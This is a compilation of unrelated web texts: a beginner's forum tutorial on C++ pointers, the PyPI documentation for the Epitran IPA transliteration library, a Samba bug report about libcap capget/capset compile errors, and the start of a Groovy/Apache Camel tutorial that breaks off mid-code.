Abhinash 102 Report post Posted August 20, 2006 As I always do, let me tell you guys that I am still just a beginner at C++ programming; it's been only about a week since I started. I am a self-learner, so I Google for ideas a lot. A better alternative to using global variables in a program is definitely pointers. A pointer is just an address. You need to keep that in mind if you want to learn how to change the value of a variable using pointers. OK guys, bear with me while I make this analogy. Trust me, THIS IS BOUND to clear up the concept of pointers. Imagine three boxes: A, B and C. The names (A, B and C) are written on the bottom face of each box (I mean to say that you can't see the name of a box without picking it up and looking at the bottom once it is placed somewhere!). Now put box A on the table, B under the table and C on the chair, with a red ball in box A. Now call in someone who doesn't know which box is which or what each (or any) box holds. Give him a note with the message "What's in the box on the table?". He will go to the box on the table (which happens to be A) and say out loud: "a red ball". You should have the idea by now. You didn't ask the person to go and search box A, but since the location "on the table" held box A, he checked THAT particular box. Here the note was the "pointer". It didn't actually contain the red ball, but it let you see what was in the box. Now, in the same situation, give a second person a note that reads "take out whatever is in the box on the table and put a blue ball there", and a third person a note that reads "check what's in the box on the table"; the third person's reply will certainly be "a blue ball". You get it? Man, you just changed the "value" of the variable "box A" without even mentioning its name! Now THAT'S why I wrote this stupid STORY. You can use the same idea to change variables from different functions, and let me tell you this...
the process we use in the program isn't even a bit close to the story; it's WAY shorter, hehe. OK, NOW I'll teach you the real stuff. First of all, how do we get the address of a variable? The answer is simple (it should be, now that you understand the concept, I suppose!): an ampersand "&" in front of any variable returns the address of that variable. Period. (In case you want to know in which format: it's hexadecimal. Whoa, now don't expect me to explain the hex format; guys, this is a tutorial on pointers, remember? If you want to ask about hex, write to me and I will explain. And if you are a die-hard KNOWER, just like me, why don't you try cout << &variablename; — it will print the address of the variable once you execute it.) OK, back to the point: the address of variable var is &var (period). Now, you can't just use any variable to hold a pointer; you need a pointer variable. A pointer variable is declared by putting * in front of the variable name, along with the type. For example, an integer pointer would be: int *IMadeAPointer; and a string pointer would be? YES, you got it: string *ThisIsFun; Now, why did I declare the integer and string pointers with different types? Well, here is the explanation, which I THINK IS TRUE. Seriously, I HAVEN'T FOUND THE REASON IN ANY BOOK WHATSOEVER, BUT THIS IS WHAT I THINK: later we change the value of the actual variable using the pointer, so to do that the compiler should be able to use the appropriate type (int, string, or whatever). So we declare the type straight away. OK guys, so if you do the following, you store the address of name in ptrname (these are just variable names I made up; they don't have to be anything specific, but it will be easier for you if you prefix the pointer's name with ptr, the way I did, DAWG. Aah, just a bit of hip-hopping!)
string name;
string *ptrname;
ptrname = &name;
*ptrname = "Baam";
cout << name;

OK, guess what you see in the output? YEP, THE ANSWER IS "Baam" (sorry if you guessed "whatever is in the name variable"). So this is how you change the value of the actual variable using a pointer variable. Remember, if you add a few things to this program, like this:

string name = "Boom";
string *ptrname;
ptrname = &name; // suppose the address of name is 0x12ac
cout << ptrname << "\n";
*ptrname = "Baam";
cout << ptrname << "\n";
cout << name;

you will see the output:

0x12ac
0x12ac
Baam

This shows that the value of the pointer has not changed; only the value of the variable the pointer points to has changed. Now comes the fun part: using functions! (OH HOW I LOVE FUNCTIONS!) I won't explain this part, though; you should understand it! (Don't disappoint me, MY PUPIL! ;))

#include <iostream>
#include <cstdlib>
#include <string>
using namespace std;

void pointer(string *ptr){
    /* I have made a few changes now, thanks to the guys whose comments
       are below mine: make sure you check the value of the pointer, for
       it might be null, and if it is null it may crash the program. So
       I added a condition that only uses the pointer if its value is
       not null. */
    if(ptr){
        *ptr = "Changed!!";
    }
    else{
        /* include the action that you want to take if the pointer
           points to nothing! */
    }
}

int main()
{
    string word = "unchanged";
    pointer(&word);
    cout << word;
    return 0;
}

and YES, you ARE done! It's no problem if you have the function in a separate source file, but remember to put a function prototype in the main file. Good luck!

[Edited by - Abhinash on August 20, 2006 2:45:52 PM]
https://www.gamedev.net/forums/topic/410488-change-the-variables-of-one-function-from-the-other-using-pointers-in-c/
Tools for transcribing languages into IPA. Project description Epitran A library and tool for transliterating orthographic text as IPA (International Phonetic Alphabet). Usage The Python modules epitran and epitran.vector can be used to easily write more sophisticated Python programs for deploying the Epitran mapping tables, preprocessors, and postprocessors. This is documented below. Using the epitran Module The Epitran class The most general functionality in the epitran module is encapsulated in the very simple Epitran class: Epitran(code, preproc=True, postproc=True, ligatures=False, cedict_file=None). Its constructor takes one argument, code, the ISO 639-3 code of the language to be transliterated, plus a hyphen, plus a four-letter code for the script (e.g. 'Latn' for Latin script, 'Cyrl' for Cyrillic script, and 'Arab' for a Perso-Arabic script). It also takes optional keyword arguments: preproc and postproc enable pre- and post-processors; these are enabled by default. ligatures enables non-standard IPA ligatures like "ʤ" and "ʨ". cedict_file gives the path to the CC-CEDict dictionary file (relevant only when working with Mandarin Chinese; because of licensing restrictions, it cannot be distributed with Epitran).

>>> import epitran
>>> epi = epitran.Epitran('uig-Arab')  # Uyghur in Perso-Arabic script

It is now possible to use the Epitran class for English and Mandarin Chinese (Simplified and Traditional) G2P as well as the other languages that use Epitran's "classic" model. For Chinese, it is necessary to point the constructor to a copy of the CC-CEDict dictionary:

>>> import epitran
>>> epi = epitran.Epitran('cmn-Hans', cedict_file='cedict_1_0_ts_utf-8_mdbg.txt')

The most useful public method of the Epitran class is transliterate: Epitran.transliterate(text, normpunc=False, ligatures=False). Convert text (in the Unicode-encoded orthography of the language specified in the constructor) to IPA, which is returned.
normpunc enables punctuation normalization and ligatures enables non-standard IPA ligatures like "ʤ" and "ʨ". Usage is illustrated below (Python 2):

>>> epi.transliterate(u'Düğün')
u'dy\u0270yn'
>>> print(epi.transliterate(u'Düğün'))
dyɰyn

Epitran.word_to_tuples(word, normpunc=False): Takes a word (a Unicode string) in a supported orthography as input and returns a list of tuples, with each tuple corresponding to an IPA segment of the word. The tuples have the following structure:

( character_category :: String, is_upper :: Integer, orthographic_form :: Unicode String, phonetic_form :: Unicode String, segments :: List<Tuples> )

Note that word_to_tuples is not implemented for all language-script pairs. The codes for character_category are the initial characters of the two-character sequences listed under "General Category" in Chapter 4 of the Unicode Standard. For example, "L" corresponds to letters and "P" corresponds to punctuation marks. The above data structure is likely to change in subsequent versions of the library.
The structure of segments is as follows: ( segment :: Unicode String, vector :: List<Integer> ) Here is an example of an interaction with word_to_tuples (Python 2): >>> import epitran >>> epi = epitran.Epitran('tur-Latn') >>> epi.word_to_tuples(u'Düğün') [(u'L', 1, u'D', u'd', [(u'd', [-1, -1, 1, -1, -1, -1, -1, -1, 1, -1, -1, 1, 1, -1, -1, -1, -1, -1, -1, 0, -1])]), (u'L', 0, u'u\u0308', u'y', [(u'y', [1, 1, -1, 1, -1, -1, -1, 0, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, 1, -1])]), (u'L', 0, u'g\u0306', u'\u0270', [(u'\u0270', [-1, 1, -1, 1, 0, -1, -1, 0, 1, -1, -1, 0, -1, 0, -1, 1, -1, 0, -1, 1, -1])]), (u'L', 0, u'u\u0308', u'y', [(u'y', [1, 1, -1, 1, -1, -1, -1, 0, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, 1, -1])]), (u'L', 0, u'n', u'n', [(u'n', [-1, 1, 1, -1, -1, -1, 1, -1, 1, -1, -1, 1, 1, -1, -1, -1, -1, -1, -1, 0, -1])])] The Backoff class Sometimes, when parsing text in more than one script, it is useful to employ a graceful backoff. If one language mode does not work, it can be useful to fall back to another, and so on. This functionality is provided by the Backoff class: Backoff(lang_script_codes, cedict_file=None) Note that the Backoff class does not currently support parameterized preprocessor and postprocessor application and does not support non-standard ligatures. It also does not support punctuation normalization. lang_script_codes is a list of codes like eng-Latn or hin-Deva. 
For example, if one were transcribing a Hindi text with many English loanwords and some stray characters of Simplified Chinese, one might use the following code (Python 3):

>>> from epitran.backoff import Backoff
>>> backoff = Backoff(['hin-Deva', 'eng-Latn', 'cmn-Hans'], cedict_file='cedict_1_0_ts_utf-8_mdbg.txt')
>>> backoff.transliterate('हिन्दी')
'ɦindiː'
>>> backoff.transliterate('English')
'ɪŋɡlɪʃ'
>>> backoff.transliterate('中文')
'ʈ͡ʂoŋwən'

Backoff works on a token-by-token basis: tokens that contain mixed scripts will be returned as the empty string, since they cannot be fully converted by any of the modes. The Backoff class has the following public methods:
- transliterate: returns a Unicode string of IPA phonemes
- trans_list: returns a list of IPA Unicode strings, each of which is a phoneme
- xsampa_list: returns a list of X-SAMPA (ASCII) strings, each of which is a phoneme

Consider the following example (Python 3):

>>> backoff.transliterate('हिन्दी')
'ɦindiː'
>>> backoff.trans_list('हिन्दी')
['ɦ', 'i', 'n', 'd', 'iː']
>>> backoff.xsampa_list('हिन्दी')
['h\\', 'i', 'n', 'd', 'i:']

DictFirst The DictFirst class provides a simple alternative to the Backoff class. It requires a dictionary of words known to be of Language A, one word per line in a UTF-8 encoded text file. It accepts three arguments: the language-script code for Language A, that for Language B, and a path to the dictionary file.
It has one public method, transliterate, which works like Epitran.transliterate except that it returns the transliteration for Language A if the input token is in the dictionary; otherwise, it returns the Language B transliteration of the token:

>>> import dictfirst
>>> df = dictfirst.DictFirst('tpi-Latn', 'eng-Latn', '../sample-dict.txt')
>>> df.transliterate('pela')
'pela'
>>> df.transliterate('pelo')
'pɛlow'

Preprocessors, postprocessors, and their pitfalls In order to build a maintainable orthography-to-phoneme mapper, it is sometimes necessary to employ preprocessors that make contextual substitutions of symbols before the text is passed to an orthography-to-IPA mapping system that preserves relationships between input and output characters. This is particularly true of languages with poor sound-symbol correspondence (like French and English). Languages like French are particularly good targets for this approach because the pronunciation of a given string of letters is highly predictable even though the individual symbols often do not map neatly onto sounds. (Sound-symbol correspondence is so poor in English that effective English G2P systems rely heavily on pronouncing dictionaries.) Preprocessing the input words to allow for straightforward grapheme-to-phoneme mappings (as is done in the current version of epitran for some languages) is advantageous because the restricted regular expression language used to write the preprocessing rules is more powerful than the language for the mapping rules and allows the equivalent of many mapping rules to be written with a single rule. Without them, providing epitran support for languages like French and German would not be practical. However, they do present some problems. Specifically, when using a language with a preprocessor, one must be aware that the input word will not always be identical to the concatenation of the orthographic strings (orthographic_form) output by Epitran.word_to_tuples.
Instead, the output of word_to_tuples will reflect the output of the preprocessor, which may delete, insert, and change letters in order to allow direct orthography-to-phoneme mapping at the next step. The same is true of other methods that rely on Epitran.word_to_tuples, such as VectorsWithIPASpace.word_to_segs from the epitran.vector module. For information on writing new pre- and post-processors, see the section "Extending Epitran with map files, preprocessors and postprocessors" below. Using the epitran.vector Module The epitran.vector module is also very simple. It contains one class, VectorsWithIPASpace, including one method of interest, word_to_segs. The constructor for VectorsWithIPASpace takes two arguments: code, the language-script code for the language to be processed, and spaces, the codes for the punctuation/symbol/IPA space in which the characters/segments from the data are expected to reside. The available spaces are listed below. Its principal method is word_to_segs: VectorsWithIPASpace.word_to_segs(word, normpunc=False). word is a Unicode string. If the keyword argument normpunc is set to True, punctuation discovered in word is normalized to ASCII equivalents.
A typical interaction with the VectorsWithIPASpace object via the word_to_segs method is illustrated here (Python 2):

>>> import epitran.vector
>>> vwis = epitran.vector.VectorsWithIPASpace('uzb-Latn', ['uzb-Latn'])
>>> vwis.word_to_segs(u'darë')
[(u'L', 0, u'd', u'd\u032a', u'40', [-1, -1, 1, -1, -1, -1, -1, -1, 1, -1, -1, 1, 1, 1, -1, -1, -1, -1, -1, 0, -1]), (u'L', 0, u'a', u'a', u'37', [1, 1, -1, 1, -1, -1, -1, 0, 1, -1, -1, -1, -1, -1, -1, -1, 1, 1, -1, 1, -1]), (u'L', 0, u'r', u'r', u'54', [-1, 1, 1, 1, 0, -1, -1, -1, 1, -1, -1, 1, 1, -1, -1, 0, 0, 0, -1, 0, -1]), (u'L', 0, u'e\u0308', u'ja', u'46', [-1, 1, -1, 1, -1, -1, -1, 0, 1, -1, -1, -1, -1, 0, -1, 1, -1, -1, -1, 0, -1]), (u'L', 0, u'e\u0308', u'ja', u'37', [1, 1, -1, 1, -1, -1, -1, 0, 1, -1, -1, -1, -1, -1, -1, -1, 1, 1, -1, 1, -1])]

(It is important to note that, though the word that serves as input (darë) has four letters, the output contains five tuples, because the last letter in darë actually corresponds to two IPA segments, /j/ and /a/.) The returned data structure is a list of tuples, each with the following structure:

( character_category :: String, is_upper :: Integer, orthographic_form :: Unicode String, phonetic_form :: Unicode String, in_ipa_punc_space :: Integer, phonological_feature_vector :: List<Integer> )

A few notes are in order regarding this data structure:
- character_category is defined as part of the Unicode standard (Chapter 4). It consists of a single, uppercase letter from the set {'L', 'M', 'N', 'P', 'S', 'Z', 'C'}. The most frequent of these are 'L' (letter), 'N' (number), 'P' (punctuation), and 'Z' (separator, including separating white space).
- is_upper consists only of integers from the set {0, 1}, with 0 indicating lowercase and 1 indicating uppercase.
- The integer in in_ipa_punc_space is an index into a list of known characters/segments such that, barring degenerate cases, each character or segment is assigned a unique and globally consistent number.
In cases where a character is encountered which is not in the known space, this field has the value -1.
- The length of the list phonological_feature_vector should be constant for any instantiation of the class (it is based on the number of features defined in panphon) but is, in principle, variable. The integers in this list are drawn from the set {-1, 0, 1}, with -1 corresponding to '-', 0 corresponding to '0', and 1 corresponding to '+'. For characters with no IPA equivalent, all values in the list are 0.

Language Support Transliteration Language/Script Pairs *Chinese G2P requires the freely available CC-CEDict dictionary. †These language preprocessors and maps naively assume a phonemic orthography. ‡English G2P requires the installation of the freely available CMU Flite speech synthesis system. Languages with limited support due to highly ambiguous orthographies Some of the languages listed above should be approached with caution. It is not possible to provide highly accurate support for these language-script pairs due to the high degree of ambiguity inherent in their orthographies. Eventually, we plan to support these languages with a different back end based on WFSTs or neural methods. Language "Spaces" Note that major languages, including French, are missing from this table due to a lack of appropriate text data. Installation of Flite (for English G2P) For use with most languages, Epitran requires no special installation steps. It can be installed as an ordinary Python package, either with pip or by running python setup.py install in the root of the source directory. However, English G2P in Epitran relies on CMU Flite, a speech synthesis package by Alan Black and other speech researchers at Carnegie Mellon University. For the current version of Epitran, you should follow the installation instructions for lex_lookup, which is used as the default G2P interface for Epitran.
t2p (not recommended) The epitran.flite module shells out to the Flite speech synthesis system to do English G2P. Flite must be installed in order for this module to function. The t2p binary from Flite is not installed by default and must be manually copied into the path. An illustration of how this can be done on a Unix-like system is given below. Note that GNU make is required and that, if you have another make installed, you may have to call gmake explicitly:

$ tar xjf flite-2.0.0-release.tar.bz2
$ cd flite-2.0.0-release/
$ ./configure && make
$ sudo make install
$ sudo cp bin/t2p /usr/local/bin

You should adapt these instructions to local conditions. Installation on Windows is easiest when using Cygwin. You will have to use your discretion in deciding where to put t2p.exe on Windows, since this may depend on your Python setup. Other platforms are likely workable but have not been tested. lex_lookup (recommended) t2p does not behave as expected on letter sequences that are highly infrequent in English. In such cases, t2p gives the pronunciation of the English letters of the name rather than an attempt at the pronunciation of the name. There is a different binary included in the most recent (pre-release) versions of Flite that behaves better in this regard, but it takes some extra effort to install. To install it, you need to obtain at least version 2.0.5 of Flite. We recommend that you obtain the source from GitHub (). Untar and compile the source, following the steps below, adjusting where appropriate for your system:

$ tar xjf flite-2.0.5-current.tar.bz2
$ cd flite-2.0.5-current

or

$ git clone git@github.com:festvox/flite.git
$ cd flite/

then

$ ./configure && make
$ sudo make install
$ cd testsuite
$ make lex_lookup
$ sudo cp lex_lookup /usr/local/bin

When installing on MacOS and other systems that use a BSD version of cp, some modification to a Makefile must be made in order to install flite-2.0.5 (between steps 3 and 4).
Edit main/Makefile and change both instances of cp -pd to cp -pR. Then resume the steps above at step 4. Usage To use lex_lookup, simply instantiate Epitran as usual, but with the code set to 'eng-Latn':

>>> import epitran
>>> epi = epitran.Epitran('eng-Latn')
>>> print epi.transliterate(u'Berkeley')
bɹ̩kli

Extending Epitran with map files, preprocessors and postprocessors Language support in Epitran is provided through map files, which define mappings between orthographic and phonetic units; preprocessors, which run before the map is applied; and postprocessors, which run after the map is applied. Maps are defined in UTF-8-encoded, comma-delimited value (CSV) files. The files are each named <iso639>-<iso15924>.csv, where <iso639> is the (three-letter, all-lowercase) ISO 639-3 code for the language and <iso15924> is the (four-letter, capitalized) ISO 15924 code for the script. These files reside in the data directory of the Epitran installation under the map, pre, and post subdirectories, respectively. The pre- and post-processor files are text files whose format is described below. They follow the same naming conventions except that they have the file extension .txt. Map files (mapping tables) The map files are simple, two-column files where the first column contains the orthographic characters/sequences and the second column contains the phonetic characters/sequences. The two columns are separated by a comma; each row is terminated by a newline. For many languages (most languages with unambiguous, phonemically adequate orthographies), just this easy-to-produce mapping file is adequate to produce a serviceable G2P system. The first row is a header and is discarded; for consistency, it should contain the fields "Orth" and "Phon". The following rows consist of two fields of any length, separated by a comma. The same phonetic form (the second field) may occur any number of times, but an orthographic form may only occur once.
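To make the mapping mechanics concrete, here is a minimal Python sketch of how such a table could be applied greedily, longest orthographic prefix first, with unmatched characters passed through into the output. The table entries are invented for illustration and are not from any actual Epitran map file; this is a sketch of the algorithm, not Epitran's implementation:

```python
def apply_map(word, table):
    """Greedy longest-prefix mapping of an orthographic form to a
    phonetic form; unmatched characters are copied through unchanged."""
    out = []
    i = 0
    max_len = max(len(orth) for orth in table)
    while i < len(word):
        # Try the longest possible prefix first, then shorter ones.
        for length in range(min(max_len, len(word) - i), 0, -1):
            chunk = word[i:i + length]
            if chunk in table:
                out.append(table[chunk])  # longest matching prefix wins
                i += length
                break
        else:
            # No non-empty prefix is in the table: pass the character
            # through to the "phonetic" form rather than lose it.
            out.append(word[i])
            i += 1
    return "".join(out)

# Hypothetical map, as it might appear in a CSV file ("Orth,Phon"):
table = {"ch": "t͡ʃ", "c": "k", "a": "a"}
print(apply_map("cha", table))  # "ch" matches before "c" does -> t͡ʃa
print(apply_map("qa", table))   # "q" is not in the table -> qa
```

Note how "ch" takes priority over "c" purely because the longer prefix is tried first, which is exactly the greedy behavior described for the real map files.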
Where one orthographic form is a prefix of another form, the longer form has priority in mapping. In other words, matching between orthographic units and orthographic strings is greedy. Mapping works by finding the longest prefix of the orthographic form and adding the corresponding phonetic string to the end of the phonetic form, then removing the prefix from the orthographic form and continuing in the same manner until the orthographic form is consumed. If no non-empty prefix of the orthographic form is present in the mapping table, the first character in the orthographic form is removed and appended to the phonetic form, and the normal sequence then resumes. This means that non-phonetic characters may end up in the "phonetic" form, which we judge to be better than losing information through an inadequate mapping table. Preprocessors and postprocessors For language-script pairs with more complicated orthographies, it is sometimes necessary to manipulate the orthographic form prior to mapping or to manipulate the phonetic form after mapping. This is done, in Epitran, with grammars of context-sensitive string rewrite rules. In truth, these rules would be more than adequate to solve the mapping problem as well, but in practical terms it is usually easier to let easy-to-understand and easy-to-maintain mapping files carry most of the weight of conversion and to reserve the more powerful context-sensitive grammar formalism for pre- and post-processing. The preprocessor and postprocessor files have the same format. They consist of a sequence of lines, each of one of four types:
- Symbol definitions
- Context-sensitive rewrite rules
- Comments
- Blank lines

Symbol definitions Lines like the following:

::vowels:: = a|e|i|o|u

define symbols that can be reused in writing rules. Symbols must consist of a prefix of two colons, a sequence of one or more lowercase letters and underscores, and a suffix of two colons.
They are separated from their definitions by the equals sign (optionally set off with white space). The definition consists of a substring of a regular expression. Symbols must be defined before they are referenced. Rewrite rules Context-sensitive rewrite rules in Epitran are written in a format familiar to phonologists but transparent to computer scientists. They can be schematized as

a -> b / X _ Y

which can be rewritten as XaY → XbY. The arrow -> can be read as "is rewritten as" and the slash / can be read as "in the context". The underscore indicates the position of the symbol(s) being rewritten. Another special symbol is the octothorpe #, which indicates the beginning or end of a (word-length) string, i.e. a word boundary. Consider the following rule:

e -> ə / _ #

This rule can be read as "/e/ is rewritten as /ə/ in the context at the end of the word." A final special symbol is zero, 0, which represents the empty string. It is used in rules that insert or delete segments. Consider the following rule, which deletes /ə/ between /k/ and /l/:

ə -> 0 / k _ l

All rules must include the arrow operator, the slash operator, and the underscore. A rule that applies in a context-free fashion can be written in the following way:

ch -> x / _

The implementation of context-sensitive rules in Epitran pre- and post-processors uses regular expression replacement. Specifically, it employs the regex package, a drop-in replacement for re. Because of this, regular expression notation can be used in writing rules:

c -> s / _ [ie]

or

c -> s / _ (i|e)

For a complete guide to regex regular expressions, see the documentation for re and for regex, specifically. Fragments of regular expressions can be assigned to symbols and reused throughout a file. For example, a symbol for the disjunction of vowels in a language can be used in a rule that changes /u/ into /w/ before vowels:

::vowels:: = a|e|i|o|u
...
u -> w / _ (::vowels::)

There is a special construct for handling cases of metathesis (where "AB" is replaced with "BA"). For example, the rule:

(?P<sw1>[เแโไใไ])(?P<sw2>.) -> 0 / _

will "swap" the positions of any character in "เแโไใไ" and any following character. Left of the arrow, there should be two groups (surrounded by parentheses) with the names sw1 and sw2 (a name for a group is specified by ?P<name> appearing immediately after the open parenthesis for the group). The substrings matched by the two groups, sw1 and sw2, will be "swapped", or metathesized. The item immediately right of the arrow is ignored, but the context is not. The rules apply in order, so earlier rules may "feed" and "bleed" later rules. Their sequence is therefore very important and can be leveraged to achieve the desired results. Comments and blank lines (lines consisting only of white space) are allowed to make your code more readable. Any line in which the first non-whitespace character is a percent sign % is interpreted as a comment; the rest of the line is ignored when the file is interpreted. Blank lines are also ignored. A strategy for adding language support Epitran uses a mapping-and-repairs approach to G2P. It is expected that there is a mapping between graphemes and phonemes that can do most of the work of converting orthographic representations to phonological representations. In phonemically adequate orthographies, this mapping can do all of the work. This mapping should be completed first. For many languages, a basis for this mapping table already exists on Wikipedia and Omniglot (though the Omniglot tables are typically not machine-readable). On the other hand, many writing systems deviate from the phonemically adequate ideal. It is here that pre- and post-processors must be introduced. For example, in Swedish, the letter <a> receives a different pronunciation before two consonants (/ɐ/) than elsewhere (/ɑː/).
It makes sense to add a preprocessor rule that rewrites <a> as /ɐ/ before two consonants (and similar rules for the other vowels, since they are affected by the same condition). Preprocessor rules should generally be employed whenever the orthographic representation must be adjusted (by contextual changes, deletions, etc.) prior to the mapping step. One common use for postprocessors is to eliminate characters that are needed by the preprocessors or maps but which should not appear in the output. A classic example of this is the virama used in Indic scripts. In these scripts, in order to write a consonant not followed by a vowel, one uses the form of the consonant symbol with a particular inherent vowel, followed by a virama (which has various names in different Indic languages). An easy way of handling this is to allow the mapping to translate the consonant into an IPA consonant plus an inherent vowel (which, for a given language, will always be the same), then use the postprocessor to delete the vowel + virama sequence wherever it occurs. In fact, any situation where a character introduced by the map needs to be subsequently deleted is a good use case for postprocessors. Another example from Indian languages is so-called schwa deletion. Some vowels implied by a direct mapping between the orthography and the phonology are not actually pronounced; these vowels can generally be predicted. In most languages, they occur in the context after a vowel+consonant sequence and before a consonant+vowel sequence. In other words, the rule looks like the following:

ə -> 0 / (::vowel::)(::consonant::) _ (::consonant::)(::vowel::)

Perhaps the best way to learn how to structure language support for a new language is to consult the existing languages in Epitran. The French preprocessor fra-Latn.txt and the Thai postprocessor tha-Thai.txt illustrate many of the use cases for these rules.
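Since such rules compile down to regular-expression replacement, a schwa-deletion rule of this shape can be approximated with lookbehind and lookahead assertions. The following is a minimal sketch using Python's standard re module; the vowel and consonant inventories are invented placeholders, not Epitran's actual symbol definitions, and this is not Epitran's own rule compiler:

```python
import re

# Placeholder inventories, standing in for ::vowel:: and ::consonant::
VOWELS = "aeiouə"
CONSONANTS = "bcdfghjklmnpqrstvwxyz"

# ə -> 0 / (::vowel::)(::consonant::) _ (::consonant::)(::vowel::)
# expressed as: delete ə when preceded by VC and followed by CV.
SCHWA_DELETION = re.compile(
    "(?<=[{v}][{c}])ə(?=[{c}][{v}])".format(v=VOWELS, c=CONSONANTS))

def delete_schwa(form):
    """Apply the schwa-deletion rule to a phonetic form."""
    return SCHWA_DELETION.sub("", form)

print(delete_schwa("karəna"))  # ə sits between "ar" and "na": deleted
print(delete_schwa("əkə"))     # no VC _ CV context: left unchanged
```

The lookarounds keep the context out of the match itself, so only the ə is consumed and deleted, mirroring how the underscore in the rule notation marks just the rewritten segment.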
Citing Epitran If you use Epitran in published work, or in other research, please use the following citation: David R. Mortensen, Siddharth Dalmia, and Patrick Littell. 2018. Epitran: Precision G2P for many languages. In Proceedings of the Eleventh International Conference on Language Resources and Evaluation (LREC 2018), Paris, France. European Language Resources Association (ELRA).

@InProceedings{Mortensen-et-al:2018,
  author = {Mortensen, David R. and Dalmia, Siddharth and Littell, Patrick},
  title = {Epitran: Precision {G2P} for Many Languages},
  booktitle = {Proceedings of the Eleventh International Conference on Language Resources and Evaluation (LREC 2018)},
  year = {2018},
  month = {May},
  date = {7--12},
  location = {Miyazaki, Japan},
  editor = {Nicoletta Calzolari (Conference chair) and Khalid Choukri and Christopher Cieri and Thierry Declerck and Sara Goggi and Koiti Hasida and Hitoshi Isahara and Bente Maegaard and Joseph Mariani and H\'el\`ene}
}
https://pypi.org/project/epitran/
The Samba-Bugzilla – Bug 5285 missing capget/capset detection leading to compile errors with libcap-2.x Last modified: 2008-06-11 15:57:21 UTC The recent libcap-2.x versions actually define capget and capset without having to undefine _POSIX_SOURCE. This leads to compile errors due to different signatures (static vs non-static defined capget/capset). Therefore, configure should properly detect this. Created attachment 3153 [details] 3.0.28-libcap_detection.patch This patch adds the necessary check and the #ifdef ... #endif stuff. samba-3.2_pre2 is also affected and doesn't build without the patch. Applied your patch -- now it does not compile on my OpenSUSE 10.2 anymore. Volker hmm, strange. What's the error? Created attachment 3268 [details] Different approach for fixing compilation problems This patch: - removes explicit declarations of capget/capset from oplock_linux.c - removes struct definitions, relying on the definitions in linux/capabilities.h (also static is added, as they are not used outside oplock_linux.c) Samba will compile fine both under libcap-1.x and libcap-2.x w/o any warnings. Sure it will compile fine since linux/capabilities.h is provided by the kernel and not libcap. If they once differ you've got a problem and this is (from my understanding) not what's wanted. (In reply to comment #3) > Applied your patch -- now it does not compile on my OpenSUSE 10.2 anymore. > Volker On FC9 with patch compiled successfully We should move away from capget/capset and use the portable equivalents. Created attachment 3314 [details] move to portable capability functions (3-0-test) Created attachment 3315 [details] move to portable capability functions (3-2-test/3-3-test) Ok, I checked in these patches for 3-0-test, 3-2-test and 3-3-test. Build should be fine everywhere now. Thanks for the report! *** Bug 5537 has been marked as a duplicate of this bug. ***
https://bugzilla.samba.org/show_bug.cgi?id=5285
CC-MAIN-2017-43
refinedweb
318
52.56
Apache Camel is a routing and mediation engine which implements the Enterprise Integration Patterns. But don't let the words Enterprise Integration scare you off. Camel is designed to be really lightweight and has a small footprint. It can be reused anywhere, whether in a servlet, in a Web services stack, inside a full ESB or a standalone messaging application. Camel makes it really simple to implement a messaging application. So there are not many reasons why you could not use it in a non-enterprise application. In fact, it is possible to use Camel as a tool, similar to the way you use scripting languages. For example, you could fire up the Camel Web Console and define a messaging application without writing a single line of code.

This article is a getting-started type of tutorial. As you might have guessed, I'm going to use Groovy as the programming language. And the programs in this article are intended to be run with Groovysh, the Groovy Shell. Reasons:
- Groovy is concise, expressive and has less noise than Java. All programs in this article are just a couple dozen lines long and should be real easy to follow along.
- Using Groovysh allows the reader to interact with the application.

I'm a Linux guy and am comfortable with VIM and working in the command line. So bear with me.

Putting the pieces together

First, I'm going to write a simple program to make sure I'm able to talk to Camel in Groovy. I'm not using an IDE like Eclipse, nor creating a project, nor going to use any build tools like Maven. Any text editor will be sufficient. Save the following code to a file named CamelDemo.groovy (source download).
import groovy.grape.Grape

Grape.grab(group:"org.apache.camel", module:"camel-core", version:"2.0.0")

class MyRouteBuilder extends org.apache.camel.builder.RouteBuilder {
    void configure() {
        from("direct://foo").to("mock://result")
    }
}

mrb = new MyRouteBuilder()
ctx = new org.apache.camel.impl.DefaultCamelContext()
ctx.addRoutes mrb
ctx.start()

p = ctx.createProducerTemplate()
p.sendBody "direct:foo", "Camel Ride for beginner"

e = ctx.getEndpoint("mock://result")
ex = e.exchanges.first()
println "INFO> ${ex}"

This little program does a couple things:
- Imports the camel-core jar using Grape.grab()
- Defines our custom RouteBuilder, which defines a simple route between the direct:foo and mock:result endpoints.
- Instantiates the CamelContext, adds our custom RouteBuilder to it and starts Camel with ctx.start().
- Tests the route by sending a message exchange using the producerTemplate obtained from the CamelContext
- Looks up the mock:result endpoint (ctx.getEndpoint("mock:result")) and displays the first Exchange, which should contain the message we just sent.

Now start the groovysh in a command window and load the program:

$ groovysh
groovy:000> load CamelDemo.groovy

you should see a bunch of output and then the output from the script:

INFO> Exchange[Message: Camel Ride for beginner]
===> null
groovy:000>

At this point, you can interact with the program via groovysh. For example the following shows a few things you can do.
groovy:000> ctx.routes
===> [EventDrivenConsumerRoute[Endpoint[seda://foo] -> UnitOfWork(Channel[sendTo(Endpoint[mock://result])])]]
groovy:000> ctx.components
===> {mock=org.apache.camel.component.mock.MockComponent@14f2bd7, seda=org.apache.camel.component.seda.SedaComponent@c759f5}
groovy:000> ctx.endpoints
===> [Endpoint[seda://foo], Endpoint[mock://result]]
groovy:000> ctx.endpoints[1].exchanges
===> [Exchange[Message: Camel Ride for beginner]]
groovy:000> ctx.endpoints[1].exchanges[0].in.body
===> Camel Ride for beginner
groovy:000> p.sendBody("seda:foo", "Camel Kicking")
===> null
groovy:000> e.exchanges
===> [Exchange[Message: Camel Ride for beginner], Exchange[Message: Camel Kicking]]

This is it for our first Groovy/Camel program. For the curious, you can actually modify the program and reload it without terminating and restarting groovysh.

Camel Stock Quote

This is a simple stock quote application. Initially, I planned to walk you thru the development steps, from adding a simple bean as a Processor to transforming it to a Multi-Channel, Multi-Data-Format service application. But after I've finished developing the program, it turns out that it is too simple to justify such elaboration. To save your time and mine, I'm just going to show you the final version right here. Take a look at it, and if you can understand what it does, then maybe you should skip the rest of this article :) Save the following code to a file named StockQuote.groovy (source download).
import groovy.grape.Grape

Grape.grab(group:"org.apache.camel", module:"camel-core", version:"2.0.0")
Grape.grab(group:"org.apache.camel", module:"camel-jetty", version:"2.0.0")
Grape.grab(group:"org.apache.camel", module:"camel-freemarker", version:"2.0.0")

class QuoteServiceBean {
    public String usStock(String symbol) {
        "${symbol}: 123.50 US\$"
    }
    public String hkStock(String symbol) {
